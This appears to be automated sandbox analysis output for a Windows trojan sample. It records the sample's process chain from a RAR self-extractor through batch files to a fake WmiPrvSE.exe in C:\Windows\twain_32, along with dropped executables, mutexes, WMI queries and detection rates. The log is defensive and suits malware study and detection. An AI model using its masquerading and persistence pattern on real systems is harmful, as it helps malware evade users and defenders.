Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll

Uses 32bit PE files

Source: JAJL2EYBPH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@114/50@1/1

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B87727 GetLastError,FormatMessageW,

0_2_00B87727

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B9B6D2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00B9B6D2

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

File created: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

File created: C:\Users\Public\Music\QmitaxvEcgoLLOqeIEyLx.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\twain_32\WmiPrvSE.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\twain_32\WmiPrvSE.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\3b2259475261fce0542be8d1ba386881c0bdd3eefdac74564ad4d6228ffb22f8
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Command line argument: sfxname	0_2_00B9F05C
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Command line argument: sfxstime	0_2_00B9F05C
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Command line argument: STARTDLG	0_2_00B9F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Command line argument: sfxname	3_2_009FF05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Command line argument: sfxstime	3_2_009FF05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Command line argument: STARTDLG	3_2_009FF05C

Source: JAJL2EYBPH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: JAJL2EYBPH.exe	Virustotal: Detection: 70%
Source: JAJL2EYBPH.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

File read: C:\Users\user\Desktop\JAJL2EYBPH.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\JAJL2EYBPH.exe "C:\Users\user\Desktop\JAJL2EYBPH.exe"
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZXPLL9zJFP.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UO0HaVbJ1O.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\v8evR6XBmk.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3LXAY36iRv.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NqvJKoZOIs.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rq9fLK5Nyj.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Vs6Gb3dzjw.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diBg3fIzhe.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nBqbaEi3SG.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g3J0tdP0ue.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZXPLL9zJFP.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UO0HaVbJ1O.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\v8evR6XBmk.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3LXAY36iRv.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
